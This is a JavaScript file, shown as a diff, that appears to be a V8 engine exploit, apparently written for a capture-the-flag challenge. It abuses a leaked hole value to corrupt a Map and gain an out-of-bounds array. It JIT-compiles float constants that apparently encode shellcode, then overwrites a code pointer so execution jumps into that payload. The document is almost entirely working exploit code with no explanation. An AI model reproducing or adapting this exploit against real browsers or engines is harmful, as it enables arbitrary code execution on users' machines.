|
| 1 | +// local offsets |
| 2 | +let conversion_buffer = new ArrayBuffer(8); |
| 3 | +let float_view = new Float64Array(conversion_buffer); |
| 4 | +let int_view = new BigUint64Array(conversion_buffer); |
| 5 | +BigInt.prototype.hex = function() { |
| 6 | + return '0x' + this.toString(16); |
| 7 | +}; |
| 8 | +BigInt.prototype.i2f = function() { |
| 9 | + int_view[0] = this; |
| 10 | + return float_view[0]; |
| 11 | +} |
| 12 | + |
| 13 | +Number.prototype.f2i = function() { |
| 14 | + float_view[0] = this; |
| 15 | + return int_view[0]; |
| 16 | +} |
| 17 | + |
| 18 | +Number.prototype.i2f = function() { |
| 19 | + return BigInt(this).i2f(); |
| 20 | +} |
| 21 | + |
| 22 | +function hex(a) { |
| 23 | + return "0x" + a.toString(16); |
| 24 | +} |
| 25 | + |
| 26 | + |
| 27 | + |
| 28 | + |
| 29 | +var map1 = null; |
| 30 | +var foo_arr = null; |
| 31 | +var obj_arr = null; |
| 32 | +var ab = null; |
| 33 | +var foo = null; |
| 34 | +function getmap(){ |
| 35 | + let hole = Array.prototype.hole(); |
| 36 | + |
| 37 | + var map = new Map(); |
| 38 | + var victim = [1.1,1.2,1.3]; |
| 39 | + map.set(1, 1); |
| 40 | + map.set(hole, 1); |
| 41 | + |
| 42 | + map.delete(hole); |
| 43 | + map.delete(hole); |
| 44 | + map.delete(1); |
| 45 | + return map |
| 46 | +} |
| 47 | + |
| 48 | +function gc() { |
| 49 | + for (let i = 0; i < 1; ++i) { |
| 50 | + let buffer = new ArrayBuffer(2 ** 35 - 1).buffer; |
| 51 | + } |
| 52 | +} |
| 53 | +ab = new ArrayBuffer(4); |
| 54 | +nogc = []; |
| 55 | + |
| 56 | +for (let i = 0; i < 1000; i++) { |
| 57 | + map1 = getmap(map1); |
| 58 | + nogc.push(map1); |
| 59 | + |
| 60 | + foo_arr = new Array(1.1, 1.1); |
| 61 | + obj_arr = new Array(0x1337,{}); |
| 62 | + |
| 63 | + nogc.push(foo_arr); |
| 64 | + nogc.push(obj_arr); |
| 65 | + |
| 66 | +} |
| 67 | + |
| 68 | + |
| 69 | +map1.set(0x10, -1); |
| 70 | + |
| 71 | +gc(); |
| 72 | +foo = ()=> |
| 73 | +{ |
| 74 | + return [1.0, |
| 75 | + 1.971182936312695e-246, |
| 76 | + 1.957059683370094e-246, |
| 77 | + 1.9711829275191414e-246, |
| 78 | + 1.971025155563905e-246, |
| 79 | + 1.9711125195806515e-246, |
| 80 | + 1.9710251539303214e-246, |
| 81 | + 1.9711826571398815e-246, |
| 82 | + 1.9710435748055855e-246, |
| 83 | + 1.971025156844263e-246, |
| 84 | + 1.9711832076594195e-246, |
| 85 | + 1.9711823546555445e-246, |
| 86 | + 1.9710251537800814e-246, |
| 87 | + 1.9711829000963798e-246, |
| 88 | + 1.935386242414015e-246, |
| 89 | + 1.9322135955320268e-246, |
| 90 | + 5.547942592569329e-232, |
| 91 | + 5.547942592563475e-232, |
| 92 | + 5.548386605550227e-232, |
| 93 | + 5.497621117806851e-232, |
| 94 | + 5.547942592563292e-232, |
| 95 | + 5.555290044135785e-232, |
| 96 | + 5.547942592582329e-232, |
| 97 | + 5.5479944671360564e-232, |
| 98 | + 5.547942597961432e-232, |
| 99 | + 5.5483866105641465e-232, |
| 100 | + 5.548206933798644e-232, |
| 101 | + 5.5479425977377224e-232, |
| 102 | + 5.548387882601246e-232, |
| 103 | + 5.5483850737849856e-232, |
| 104 | + 5.547942597164718e-232, |
| 105 | + 5.548385878712101e-232, |
| 106 | + 5.548210797194847e-232, |
| 107 | + 5.5479581402263505e-232, |
| 108 | + 1.1]; |
| 109 | +} |
| 110 | + |
| 111 | + |
| 112 | +for (let i = 0; i < 0x10000; i++) { |
| 113 | + foo();foo();foo();foo(); |
| 114 | +} |
| 115 | + |
| 116 | +map1.set(foo_arr, 0xffff); |
| 117 | + |
| 118 | +console.log(foo_arr.length); |
| 119 | + |
| 120 | +var code_index = 100; |
| 121 | +var code_lo_lo = foo_arr[code_index].f2i() & 0xffffffffn; |
| 122 | +var code_lo_hi = foo_arr[code_index].f2i() & 0xffffffff00000000n; |
| 123 | +var sc_ptr = code_lo_hi >> 32n; |
| 124 | +sc_ptr += 0x79n; |
| 125 | +var new_code = (sc_ptr << 32n | code_lo_lo); |
| 126 | +foo_arr[code_index] = new_code.i2f(); |
| 127 | +foo() |